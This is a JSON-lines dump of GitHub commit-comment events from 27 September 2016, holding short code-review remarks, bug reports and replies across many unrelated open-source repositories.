{"id":"4626628943","type":"CommitCommentEvent","actor":{"login":"buddha87"},"repo":{"name":"humhub/humhub-modules-custom-pages"},"payload":{"comment":{"id":19197314,"position":null,"line":null,"path":null,"commit_id":"b2bff948725aaa0cd98456c67e7560b0cb98ca5e","created_at":"2016-09-27T20:09:51Z","updated_at":"2016-09-27T20:09:51Z","body":"I doubt this refers to the update itself, it seems somehow your db connection was killed, where exactly does this occure and was the update succesful beside this error ?\r\n\r\nFurthermore check the logs for a full error stack and rather open a new issue.\r\n\r\nYou can configure a url (for example 'myTestPage') for global pages which should result in a custom page url like mysite.com/p/myTestPage. This only works if you enabled URL Rewriting https://www.humhub.org/docs/guide-admin-installation.html#enable-url-rewriting-optional"}},"created_at":"2016-09-27T20:09:51Z"}
{"id":"4626632138","type":"CommitCommentEvent","actor":{"login":"jsaleigh"},"repo":{"name":"BranchMetrics/web-branch-deep-linking"},"payload":{"comment":{"id":19197321,"position":4,"line":467,"path":"src/6_branch.js","commit_id":"a45b761bd87226c456c2370b402607e744e52838","created_at":"2016-09-27T20:10:27Z","updated_at":"2016-09-27T20:10:27Z","body":"Might be better with:\r\n```if (typeof self.__deepviewRequestForReplay === 'function') {```"}},"created_at":"2016-09-27T20:10:27Z"}
{"id":"4626634865","type":"CommitCommentEvent","actor":{"login":"NycuRO"},"repo":{"name":"caspervanneck/Apollo-v2"},"payload":{"comment":{"id":19197332,"position":null,"line":null,"path":null,"commit_id":"bdd95d816fe2f6063eeab5f391e2c01372bad375","created_at":"2016-09-27T20:10:57Z","updated_at":"2016-09-27T20:10:57Z","body":"thx for tag"}},"created_at":"2016-09-27T20:10:57Z"}
{"id":"4626636438","type":"CommitCommentEvent","actor":{"login":"alexandrudima"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19197337,"position":30,"line":643,"path":"src/vs/vscode.d.ts","commit_id":"7f0e2adacf4a8740bda8b0a4049b34cb670eb30b","created_at":"2016-09-27T20:11:12Z","updated_at":"2016-09-27T20:11:12Z","body":"fyi @jrieken "}},"created_at":"2016-09-27T20:11:12Z"}
{"id":"4626639539","type":"CommitCommentEvent","actor":{"login":"afraser35"},"repo":{"name":"afraser35/Portfolio"},"payload":{"comment":{"id":19197342,"position":12,"line":10,"path":"README.md","commit_id":"25ee20f86b474f62443482484c1fd40575f0a16c","created_at":"2016-09-27T20:11:50Z","updated_at":"2016-09-27T20:11:50Z","body":"Determines how many box numbers for each word"}},"created_at":"2016-09-27T20:11:50Z"}
{"id":"4626645363","type":"CommitCommentEvent","actor":{"login":"nook-ru"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19197358,"position":null,"line":null,"path":null,"commit_id":"b9776214727a0c916d59e069285f9f25ce65bb7d","created_at":"2016-09-27T20:12:55Z","updated_at":"2016-09-27T20:12:55Z","body":"Валится с каким сообщением? Скорее всего не в отсутствии ключа дело. Первым шагом в установке модулей должна быть установка БД. Если эту последовательность нарушить, битрикс на запишет триальный срок и свалится с ошибкой на следующем хите"}},"created_at":"2016-09-27T20:12:55Z"}
{"id":"4626646645","type":"CommitCommentEvent","actor":{"login":"pavelbar"},"repo":{"name":"pavelbar/mp2-lab1-set"},"payload":{"comment":{"id":19197363,"position":null,"line":null,"path":null,"commit_id":"154e586e903a36d05beb69c0a53553ef0025e4aa","created_at":"2016-09-27T20:13:09Z","updated_at":"2016-09-27T20:13:09Z","body":"Этот коммит с мусором, Я извиняюсь."}},"created_at":"2016-09-27T20:13:09Z"}
{"id":"4626647524","type":"CommitCommentEvent","actor":{"login":"pavelbar"},"repo":{"name":"pavelbar/mp2-lab1-set"},"payload":{"comment":{"id":19197365,"position":null,"line":null,"path":null,"commit_id":"8e6308c409b25408c00655d5e9df31e684422206","created_at":"2016-09-27T20:13:18Z","updated_at":"2016-09-27T20:13:18Z","body":"Этот коммит с мусором, Я извиняюсь."}},"created_at":"2016-09-27T20:13:18Z"}
{"id":"4626647785","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/Objectively"},"payload":{"comment":{"id":19197367,"position":null,"line":null,"path":null,"commit_id":"174beddcacdb727609b8b6f44e5b9fb9d5eab599","created_at":"2016-09-27T20:13:22Z","updated_at":"2016-09-27T20:13:22Z","body":"Uh, definitely not a memory leak. You broke Object::copy. Please run `make check` before pushing to master :)"}},"created_at":"2016-09-27T20:13:22Z"}
{"id":"4626648083","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197370,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T20:13:24Z","updated_at":"2016-09-27T20:13:24Z","body":"I can't find the invitation"}},"created_at":"2016-09-27T20:13:24Z"}
{"id":"4626649783","type":"CommitCommentEvent","actor":{"login":"FFroehlich"},"repo":{"name":"ICB-DCM/AMICI"},"payload":{"comment":{"id":19197375,"position":4,"line":34,"path":"@amimodel/generateC.m","commit_id":"d70ff23865a8a19a33ef14a47b161dd3551ae58c","created_at":"2016-09-27T20:13:42Z","updated_at":"2016-09-27T20:13:42Z","body":"for future reference: if we change anything in generateC that changes the generated code you need to increase compver property in amimodel by 1 to force recompilation. Would be great to have something smarter to do this, but that's how it is at the moment."}},"created_at":"2016-09-27T20:13:42Z"}
{"id":"4626651004","type":"CommitCommentEvent","actor":{"login":"ProgrammerDan"},"repo":{"name":"schweinefilet/SimpleAdminHacks"},"payload":{"comment":{"id":19197379,"position":36,"line":36,"path":"src/main/java/com/programmerdan/minecraft/simpleadminhacks/configs/ReinforcedChestBreakConfig.java","commit_id":"052b8b08341b68d82fc404ae9ca7581aa3d42db5","created_at":"2016-09-27T20:13:55Z","updated_at":"2016-09-27T20:13:55Z","body":"Instead of this, check out what I do here, and use that pattern instead:\r\n\r\nhttps://github.com/DevotedMC/SimpleAdminHacks/blob/master/src/main/java/com/programmerdan/minecraft/simpleadminhacks/hacks/CTAnnounce.java#L61\r\n\r\nOr in this case, just send your messages via plugin().serverOperatorBroadcast(cleanMessage); and don't worry about configuring a list at all."}},"created_at":"2016-09-27T20:13:55Z"}
{"id":"4626657231","type":"CommitCommentEvent","actor":{"login":"pavel63"},"repo":{"name":"pavel63/DevIntensive"},"payload":{"comment":{"id":19197391,"position":4,"line":15,"path":"app/src/main/java/com/softdesign/devintensive/ui/activities/MainActivity.java","commit_id":"385d41ea82adade1c8999f52e261a4542bbba9bf","created_at":"2016-09-27T20:15:06Z","updated_at":"2016-09-27T20:15:06Z","body":"fdc"}},"created_at":"2016-09-27T20:15:06Z"}
{"id":"4626663041","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197410,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T20:16:07Z","updated_at":"2016-09-27T20:16:07Z","body":"@cybrann Click https://github.com/JadeEmu/JadeCore_547/invitations"}},"created_at":"2016-09-27T20:16:07Z"}
{"id":"4626678389","type":"CommitCommentEvent","actor":{"login":"6bee"},"repo":{"name":"6bee/aqua-core"},"payload":{"comment":{"id":19197466,"position":16,"line":35,"path":"src/Aqua/Aqua/TypeExtensions.cs","commit_id":"9dcc464c9f3945fb39ff7ae4b5563fa6cb99fb82","created_at":"2016-09-27T20:18:48Z","updated_at":"2016-09-27T20:18:48Z","body":"Thanks for pointing out. It's done in commit 5fc292f in case you'd like to review.\r\nPlease note I'm not using `Attribute.IsDefined()` since this method is not available in netstandard."}},"created_at":"2016-09-27T20:18:48Z"}
{"id":"4626679932","type":"CommitCommentEvent","actor":{"login":"ProgrammerDan"},"repo":{"name":"schweinefilet/SimpleAdminHacks"},"payload":{"comment":{"id":19197473,"position":81,"line":81,"path":"src/main/java/com/programmerdan/minecraft/simpleadminhacks/hacks/ReinforcedChestBreak.java","commit_id":"052b8b08341b68d82fc404ae9ca7581aa3d42db5","created_at":"2016-09-27T20:19:04Z","updated_at":"2016-09-27T20:19:04Z","body":"Again, the CTAnnounce pattern could be useful here.\r\n\r\nTrack break initiation by player; when its time to notify OPs based on your timed task, send all new breaks tracked at that time, then clear the list after sending. \r\n\r\nAs currently coded, only a single break even will be sent to OPs, so if multiple are occurring at the same time we might never get a notice."}},"created_at":"2016-09-27T20:19:04Z"}
{"id":"4626682888","type":"CommitCommentEvent","actor":{"login":"anatexis"},"repo":{"name":"edj-boston/coursera-r-programming"},"payload":{"comment":{"id":19197480,"position":null,"line":null,"path":null,"commit_id":"223ce95a00a3fdb3baa20cd280ebecb1a01a3a66","created_at":"2016-09-27T20:19:35Z","updated_at":"2016-09-27T20:19:35Z","body":"Hey I'm not sure, but I think posting the answers to quizzes of Coursera is a violation of their honor code (https://www.coursera.org/about/terms/honorcode point 3)."}},"created_at":"2016-09-27T20:19:35Z"}
{"id":"4626686031","type":"CommitCommentEvent","actor":{"login":"laufhannes"},"repo":{"name":"Runalyze/Runalyze"},"payload":{"comment":{"id":19197485,"position":null,"line":null,"path":null,"commit_id":"5489caa1d1f3328104d35805da21f278e490f6d7","created_at":"2016-09-27T20:20:11Z","updated_at":"2016-09-27T20:20:11Z","body":"They are skipped in tcx files: https://github.com/Runalyze/Runalyze/blob/5489caa1d1f3328104d35805da21f278e490f6d7/inc/import/parser/class.ParserTCXSingle.php#L241"}},"created_at":"2016-09-27T20:20:11Z"}
{"id":"4626693304","type":"CommitCommentEvent","actor":{"login":"tapir"},"repo":{"name":"jdolan/Objectively"},"payload":{"comment":{"id":19197506,"position":null,"line":null,"path":null,"commit_id":"174beddcacdb727609b8b6f44e5b9fb9d5eab599","created_at":"2016-09-27T20:21:26Z","updated_at":"2016-09-27T20:21:26Z","body":"ah! sorry about this. I'll make sure to run tests before pushing."}},"created_at":"2016-09-27T20:21:26Z"}
{"id":"4626699106","type":"CommitCommentEvent","actor":{"login":"Alex-Kuz"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19197525,"position":2,"line":5,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T20:22:23Z","updated_at":"2016-09-27T20:22:23Z","body":"нет, недостаточно. После удаления эта переменная--, а значит возможна такая ситуация:\r\nxElement  * A = fabric(\"A\"); // m_countObj = 1; id = 0;\r\nxElement  * B = fabric(\"B\"); // m_countObj = 2; id = 1;\r\ndelete A; // m_countObj = 1; \r\nxElement  * C = fabric(\"C\"); // m_countObj = 2; id = ?;\r\n\r\nЗначит должна быть переменная, хранящая информацию об изменениях переменной количества объектов, ну или отдельная static-переменная для id. "}},"created_at":"2016-09-27T20:22:23Z"}
{"id":"4626703562","type":"CommitCommentEvent","actor":{"login":"flek123"},"repo":{"name":"flek123/ius.io"},"payload":{"comment":{"id":19197537,"position":34,"line":87,"path":"docs/Mirrors.md","commit_id":"4c2398c2f4fa1e05372c949fe2e5cde16cfc8e7b","created_at":"2016-09-27T20:23:10Z","updated_at":"2016-09-27T20:23:10Z","body":"ИУС"}},"created_at":"2016-09-27T20:23:10Z"}
{"id":"4626704841","type":"CommitCommentEvent","actor":{"login":"cmidi"},"repo":{"name":"cmidi/Bernoulli"},"payload":{"comment":{"id":19197541,"position":null,"line":null,"path":null,"commit_id":"21b238126caed1e08fcff4b6bfe09c18b8db832a","created_at":"2016-09-27T20:23:22Z","updated_at":"2016-09-27T20:23:22Z","body":"done"}},"created_at":"2016-09-27T20:23:22Z"}
{"id":"4626715622","type":"CommitCommentEvent","actor":{"login":"JithuNair"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":19197569,"position":null,"line":null,"path":null,"commit_id":"1674b673e7d51526925b600794ff766aa42f43cd","created_at":"2016-09-27T20:25:16Z","updated_at":"2016-09-27T20:25:16Z","body":"Shows an error for me. Gradle sync fails all the time 👎 "}},"created_at":"2016-09-27T20:25:16Z"}
{"id":"4626717705","type":"CommitCommentEvent","actor":{"login":"flek123"},"repo":{"name":"flek123/ius.io"},"payload":{"comment":{"id":19197574,"position":null,"line":null,"path":null,"commit_id":"4c2398c2f4fa1e05372c949fe2e5cde16cfc8e7b","created_at":"2016-09-27T20:25:37Z","updated_at":"2016-09-27T20:25:37Z","body":"4c2398c"}},"created_at":"2016-09-27T20:25:37Z"}
{"id":"4626718228","type":"CommitCommentEvent","actor":{"login":"herzberg"},"repo":{"name":"Sefaria/Sefaria-Android"},"payload":{"comment":{"id":19197577,"position":null,"line":null,"path":null,"commit_id":"b7939aff0faf2a8d241f1b0e12a0a1f9bbb38331","created_at":"2016-09-27T20:25:43Z","updated_at":"2016-09-27T20:25:43Z","body":"this shouldn't be needed anymore b/c getAllNeededLocationVariables will now set book to something... but i'll leave it in"}},"created_at":"2016-09-27T20:25:43Z"}
{"id":"4626719669","type":"CommitCommentEvent","actor":{"login":"Vaideesh"},"repo":{"name":"Vaideesh/Link-State-Routing-Protocol"},"payload":{"comment":{"id":19197581,"position":1,"line":1,"path":"README.md","commit_id":"5a4159d0728a56401f7da19de461ba23e0caa1a5","created_at":"2016-09-27T20:25:56Z","updated_at":"2016-09-27T20:25:56Z","body":"Code to implement file transfer from a client to a server using Link State Routing Protocol in C."}},"created_at":"2016-09-27T20:25:56Z"}
{"id":"4626726848","type":"CommitCommentEvent","actor":{"login":"Alex-Kuz"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19197603,"position":23,"line":18,"path":"xElement.h","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T20:27:14Z","updated_at":"2016-09-27T20:27:14Z","body":"Два режима работы - когда дан вектор, и когда дан грань куба (mask)\r\nЭто _рудимент_, сейчас можно объединить грань и входное значение.\r\n"}},"created_at":"2016-09-27T20:27:14Z"}
{"id":"4626726913","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197604,"position":null,"line":null,"path":null,"commit_id":"7ab460fe905a6694b1e7b92c96b5a811c7505626","created_at":"2016-09-27T20:27:15Z","updated_at":"2016-09-27T20:27:15Z","body":"damn!!! I love this guy! that's what we all need - mmaps! 👍 "}},"created_at":"2016-09-27T20:27:15Z"}
{"id":"4626729361","type":"CommitCommentEvent","actor":{"login":"ycho"},"repo":{"name":"ycho/aom"},"payload":{"comment":{"id":19197607,"position":5,"line":1859,"path":"av1/encoder/rdopt.c","commit_id":"a7b5f659b5750173a0bf70e816a775a4ca047eaf","created_at":"2016-09-27T20:27:42Z","updated_at":"2016-09-27T20:27:42Z","body":"In block_rd_txfm(), I don't see SSE can affect skip decision, where \nskipping of block can be only decided by PVQ itself.\n\nThe introduction of SSE is to considering the rd cost of source signal \n(residue),\nwhere the rate is accurate it is not really necessary, I think.\n\nSo, if you ever multiply SSE by the same #, I expect no meaningful \nchange happens in fact.\n\n\nOn 09/27/2016 12:13 PM, Yushin Cho wrote:\n> oh- I haven't really thought about that far, but sure I will check \n> whether what you say makes sense. Thx for comment.\n>\n> On Tue, Sep 27, 2016 at 10:22 AM, Guillaume Martres \n> <notifications@github.com <mailto:notifications@github.com>> wrote:\n>\n>     If you multiply *distortion by some factor, you should also\n>     multiply *sse by the same factor if you don't want uv skip to be\n>     picked more often\n>\n>     —\n>     You are receiving this because you authored the thread.\n>     Reply to this email directly, view it on GitHub\n>     <https://github.com/ycho/aom/commit/a7b5f659b5750173a0bf70e816a775a4ca047eaf#commitcomment-19194446>,\n>     or mute the thread\n>     <https://github.com/notifications/unsubscribe-auth/AJp3-wia-AHyw5AWHY2nGJWZGT6w8hgJks5quVDKgaJpZM4KH7sD>.\n>\n>\n>\n>\n> -- \n> Thanks!\n> Yushin\n\n"}},"created_at":"2016-09-27T20:27:42Z"}
{"id":"4626732256","type":"CommitCommentEvent","actor":{"login":"Alex-Kuz"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19197614,"position":98,"line":80,"path":"xElement.h","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T20:28:12Z","updated_at":"2016-09-27T20:28:12Z","body":"_рудимент_"}},"created_at":"2016-09-27T20:28:12Z"}
{"id":"4626734282","type":"CommitCommentEvent","actor":{"login":"amilajack"},"repo":{"name":"parallel-js/parallel.js"},"payload":{"comment":{"id":19197622,"position":13,"line":13,"path":".travis.yml","commit_id":"0266b118072c29b9d2cffbba3aa57eb83facdb1f","created_at":"2016-09-27T20:28:33Z","updated_at":"2016-09-27T20:28:33Z","body":"Travis CI is used for most dependable open source projects. I think we can help ensure our coverage by using it"}},"created_at":"2016-09-27T20:28:33Z"}
{"id":"4626738001","type":"CommitCommentEvent","actor":{"login":"MarcinWieczorek"},"repo":{"name":"GolddolphinSKB-Fexcraftian/Flansmod-Modelling-Python"},"payload":{"comment":{"id":19197627,"position":null,"line":null,"path":null,"commit_id":"d344c0613c9837c7dcfb0c112a6dc89fe48195af","created_at":"2016-09-27T20:29:13Z","updated_at":"2016-09-27T20:29:13Z","body":"![](http://weknowmemes.com/generator/uploads/generated/g139264302853038043.jpg)"}},"created_at":"2016-09-27T20:29:13Z"}
{"id":"4626739985","type":"CommitCommentEvent","actor":{"login":"lcervant2"},"repo":{"name":"lcervant2/lcervant2.github.io"},"payload":{"comment":{"id":19197631,"position":null,"line":null,"path":null,"commit_id":"e16bee60ceb899241b49af9a4a9ebc67e548d64f","created_at":"2016-09-27T20:29:34Z","updated_at":"2016-09-27T20:29:34Z","body":"add new "}},"created_at":"2016-09-27T20:29:34Z"}
{"id":"4626745278","type":"CommitCommentEvent","actor":{"login":"MWisBest"},"repo":{"name":"OMAP4-AOSP/android_frameworks_av"},"payload":{"comment":{"id":19197642,"position":5,"line":134,"path":"media/libstagefright/Android.mk","commit_id":"83776ea7cf3f6a34a94d1148aeaa22ad5a641f53","created_at":"2016-09-27T20:30:29Z","updated_at":"2016-09-27T20:30:29Z","body":"Errrrr, this should be +=, not :="}},"created_at":"2016-09-27T20:30:29Z"}
{"id":"4626745807","type":"CommitCommentEvent","actor":{"login":"APOPHIS9283"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19197645,"position":null,"line":null,"path":null,"commit_id":"4f8e151e5c37e2ceec100c82446b7b9089b29d87","created_at":"2016-09-27T20:30:35Z","updated_at":"2016-09-27T20:30:35Z","body":"I had already caught it. Just went back to my old fstab"}},"created_at":"2016-09-27T20:30:35Z"}
{"id":"4626745827","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19197646,"position":null,"line":null,"path":null,"commit_id":"ecbb97736f3368404aeed4ece4134a1f4ee58454","created_at":"2016-09-27T20:30:35Z","updated_at":"2016-09-27T20:30:35Z","body":"@cybrann ,check your e-mail also, and visit https://github.com/JadeEmu"}},"created_at":"2016-09-27T20:30:35Z"}
{"id":"4626745939","type":"CommitCommentEvent","actor":{"login":"zebraislearning"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19197647,"position":null,"line":null,"path":null,"commit_id":"43b4d7bbced1ea3e2556b7f76fe9ca8bda9b447d","created_at":"2016-09-27T20:30:37Z","updated_at":"2016-09-27T20:30:37Z","body":"I will check it soon thanks"}},"created_at":"2016-09-27T20:30:37Z"}
{"id":"4626751791","type":"CommitCommentEvent","actor":{"login":"luka5z"},"repo":{"name":"jenkinsci/docker"},"payload":{"comment":{"id":19197658,"position":null,"line":null,"path":null,"commit_id":"bbbb76d46b8ea934fdec9f2ed0ebd49a923496d4","created_at":"2016-09-27T20:31:38Z","updated_at":"2016-09-27T20:31:38Z","body":"@charles-dyfis-net, @carlossg After this commit I started to face issues with empty quoted empty strings ('') in `exec java...` line which blocks Jenkins from starting. I've found out that this could be resolved by changing an direct array printing `\"${java_opts_array[@]}\"` to `$(printf '%s ' \"${java_opts_array[@]}\")`."}},"created_at":"2016-09-27T20:31:38Z"}
{"id":"4626753455","type":"CommitCommentEvent","actor":{"login":"flek123"},"repo":{"name":"flek123/ius.io"},"payload":{"comment":{"id":19197663,"position":5,"line":57,"path":"theme/base.html","commit_id":"a5d31d5f24301cf1b47bb0d569d8b962fe832736","created_at":"2016-09-27T20:31:56Z","updated_at":"2016-09-27T20:31:56Z","body":"< P >"}},"created_at":"2016-09-27T20:31:56Z"}
{"id":"4626757033","type":"CommitCommentEvent","actor":{"login":"mikemccracken"},"repo":{"name":"juju-solutions/bundle-canonical-kubernetes"},"payload":{"comment":{"id":19197666,"position":22,"line":94,"path":"README.md","commit_id":"b078759f6d5491ebb962eecc16cc189f0ab9810a","created_at":"2016-09-27T20:32:34Z","updated_at":"2016-09-27T20:32:34Z","body":"Can you please add this hunk back in? Thanks!"}},"created_at":"2016-09-27T20:32:34Z"}
{"id":"4626760017","type":"CommitCommentEvent","actor":{"login":"NaturalmotionStudios"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19197673,"position":null,"line":null,"path":null,"commit_id":"43b4d7bbced1ea3e2556b7f76fe9ca8bda9b447d","created_at":"2016-09-27T20:33:07Z","updated_at":"2016-09-27T20:33:07Z","body":"@zebraislearning Np"}},"created_at":"2016-09-27T20:33:07Z"}
{"id":"4626761219","type":"CommitCommentEvent","actor":{"login":"Jakipi"},"repo":{"name":"Jakipi/cwm_Samsung_gt-i8200n"},"payload":{"comment":{"id":19197678,"position":null,"line":null,"path":null,"commit_id":"4856928ea35673de6199245d9f4dee976ea774e7","created_at":"2016-09-27T20:33:20Z","updated_at":"2016-09-27T20:33:20Z","body":"TWRP Recovery hab ich natürlich schon installiert."}},"created_at":"2016-09-27T20:33:20Z"}
{"id":"4626773542","type":"CommitCommentEvent","actor":{"login":"lamby"},"repo":{"name":"ioquake/ioq3"},"payload":{"comment":{"id":19197705,"position":6,"line":1103,"path":"Makefile","commit_id":"cce24668f7c602159a697911593ca0a2cce11184","created_at":"2016-09-27T20:35:28Z","updated_at":"2016-09-27T20:35:28Z","body":"This is missing ``--utc`` and ``LC_DATE=C`` or ``LC_ALL=C`` due to the use of ``%b``."}},"created_at":"2016-09-27T20:35:28Z"}
{"id":"4626775705","type":"CommitCommentEvent","actor":{"login":"Kazachenko1998"},"repo":{"name":"Kotlin-Polytech/KotlinAsFirst2016"},"payload":{"comment":{"id":19197710,"position":null,"line":null,"path":null,"commit_id":"70af30e8cb273c1f6ed060e7a09d085ad7c51923","created_at":"2016-09-27T20:35:50Z","updated_at":"2016-09-27T20:35:50Z","body":"как можно бросить исключение если мы его не ловили и не известно есть ли оно вообще?"}},"created_at":"2016-09-27T20:35:50Z"}
{"id":"4626781015","type":"CommitCommentEvent","actor":{"login":"DiglidiDudeNG"},"repo":{"name":"popcorncolonel/Chrome-Extensions"},"payload":{"comment":{"id":19197729,"position":75,"line":348,"path":"Kappa Everywhere/contentscript.js","commit_id":"365f938289577306cad9754867d44c9f27e7866c","created_at":"2016-09-27T20:36:45Z","updated_at":"2016-09-27T20:36:45Z","body":"Why was this removed? I was about to add this very feature into my fork so I could pull request it to you, but turns out the `alt` property is commented out. Any reason for that?"}},"created_at":"2016-09-27T20:36:45Z"}
{"id":"4626781758","type":"CommitCommentEvent","actor":{"login":"zebraislearning"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19197734,"position":null,"line":null,"path":null,"commit_id":"43b4d7bbced1ea3e2556b7f76fe9ca8bda9b447d","created_at":"2016-09-27T20:36:53Z","updated_at":"2016-09-27T20:36:53Z","body":"Np K Np Ok\nOn Tue, Sep 27, 2016 at 4:33 PM Nanomotion <notifications@github.com> wrote:\n\n> @zebraislearning <https://github.com/zebraislearning> Np\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dragon-drop-scratch/dragon-drop-www/commit/43b4d7bbced1ea3e2556b7f76fe9ca8bda9b447d#commitcomment-19197673>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUBvYZ5rKnUqtYWHXCs8DBc4H-enAhN1ks5quX2EgaJpZM4KIHsn>\n> .\n>\n"}},"created_at":"2016-09-27T20:36:53Z"}
{"id":"4626786584","type":"CommitCommentEvent","actor":{"login":"levity"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":19197741,"position":null,"line":null,"path":null,"commit_id":"5a01c6a3f81d0e26a1e0dcdf3f1c02987ca05dd1","created_at":"2016-09-27T20:37:46Z","updated_at":"2016-09-27T20:37:46Z","body":"Hmm, I don't think we should run that every time we load a community's posts. I see now that I overlooked it in the earlier review.\r\n\r\nI think it'd be better to add reducer logic for each of the cases that we know can change the checklist, i.e. after creating a post, after sending an invite, and so on."}},"created_at":"2016-09-27T20:37:46Z"}
{"id":"4626787771","type":"CommitCommentEvent","actor":{"login":"kmlv"},"repo":{"name":"kmlv/realeffort_one"},"payload":{"comment":{"id":19197743,"position":null,"line":null,"path":null,"commit_id":"2282d5f343bc177d0a81e16b73199e83ab55080c","created_at":"2016-09-27T20:37:58Z","updated_at":"2016-09-27T20:37:58Z","body":"ok"}},"created_at":"2016-09-27T20:37:58Z"}
{"id":"4626794438","type":"CommitCommentEvent","actor":{"login":"SGOrava"},"repo":{"name":"GlPortal/RadixEngine"},"payload":{"comment":{"id":19197753,"position":5,"line":8,"path":"include/radix/core/state/HandleGameFunction.hpp","commit_id":"8000ba023533ce85666d972291bbb2c0388e212f","created_at":"2016-09-27T20:39:10Z","updated_at":"2016-09-27T20:39:10Z","body":"This line should be in namespace radix"}},"created_at":"2016-09-27T20:39:10Z"}
{"id":"4626795886","type":"CommitCommentEvent","actor":{"login":"viro101"},"repo":{"name":"rsanchez-wsu/jfiles"},"payload":{"comment":{"id":19197754,"position":null,"line":null,"path":null,"commit_id":"a8c90e5e1b8c204a504be21884c0898933824b92","created_at":"2016-09-27T20:39:24Z","updated_at":"2016-09-27T20:39:24Z","body":"added some basic search code"}},"created_at":"2016-09-27T20:39:24Z"}
{"id":"4626804567","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19197780,"position":4,"line":7,"path":"lib/review/repo.ex","commit_id":"9bb49d2ffd476d653945cc2bc8c1311653ea01ac","created_at":"2016-09-27T20:40:55Z","updated_at":"2016-09-27T20:40:55Z","body":"This is a test of persisting review comments and showing them on https://review-on-review.herokuapp.com/comments?auth_key=demo."}},"created_at":"2016-09-27T20:40:55Z"}
{"id":"4626805932","type":"CommitCommentEvent","actor":{"login":"mitchell-as"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19197783,"position":6,"line":118,"path":"components/koGoLanguage.py","commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-27T20:41:09Z","updated_at":"2016-09-27T20:41:09Z","body":"No. If you run \"go fmt -w=false\" in the command prompt you'll get an error that says to run \"gofmt\" directly if you want to pass it fancy flags.\r\nI did test my code you know :)"}},"created_at":"2016-09-27T20:41:09Z"}
{"id":"4626806017","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19197784,"position":null,"line":null,"path":null,"commit_id":"15f2a748e591757795fe9c894fca001d1c0853be","created_at":"2016-09-27T20:41:10Z","updated_at":"2016-09-27T20:41:10Z","body":"@sdumitriu right now 0.2 is covered by tests. Should it be more tests or should I do a PR?"}},"created_at":"2016-09-27T20:41:10Z"}
{"id":"4626811399","type":"CommitCommentEvent","actor":{"login":"amandamoran"},"repo":{"name":"mkby/newinstaller"},"payload":{"comment":{"id":19197805,"position":5,"line":43,"path":"traf_sqconfig.py","commit_id":"c2b59e364e7bad53619eb9eb587911a1ab286597","created_at":"2016-09-27T20:42:08Z","updated_at":"2016-09-27T20:42:08Z","body":"Can change this to <=256 else 255"}},"created_at":"2016-09-27T20:42:08Z"}
{"id":"4626814475","type":"CommitCommentEvent","actor":{"login":"Naatan"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19197815,"position":6,"line":118,"path":"components/koGoLanguage.py","commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-27T20:42:41Z","updated_at":"2016-09-27T20:42:41Z","body":"Ok, but the way it's written now it assumes `%(go)` resolves to an executable named go which resides in the same directory as gofmt?"}},"created_at":"2016-09-27T20:42:41Z"}
{"id":"4626816446","type":"CommitCommentEvent","actor":{"login":"kbrandwijk"},"repo":{"name":"NathanWalker/angular2-seed-advanced"},"payload":{"comment":{"id":19197819,"position":14,"line":394,"path":"tools/config/seed.config.ts","commit_id":"0045053d30ff59ff88e201bfb020820bdaae2fd5","created_at":"2016-09-27T20:43:02Z","updated_at":"2016-09-27T20:43:02Z","body":"This line is causing #250 as far as I can see."}},"created_at":"2016-09-27T20:43:02Z"}
{"id":"4626819284","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19197824,"position":null,"line":null,"path":null,"commit_id":"6a26ed7cc95e5df057cd153e69b7c2ec69b89995","created_at":"2016-09-27T20:43:30Z","updated_at":"2016-09-27T20:43:30Z","body":"Initial commit"}},"created_at":"2016-09-27T20:43:30Z"}
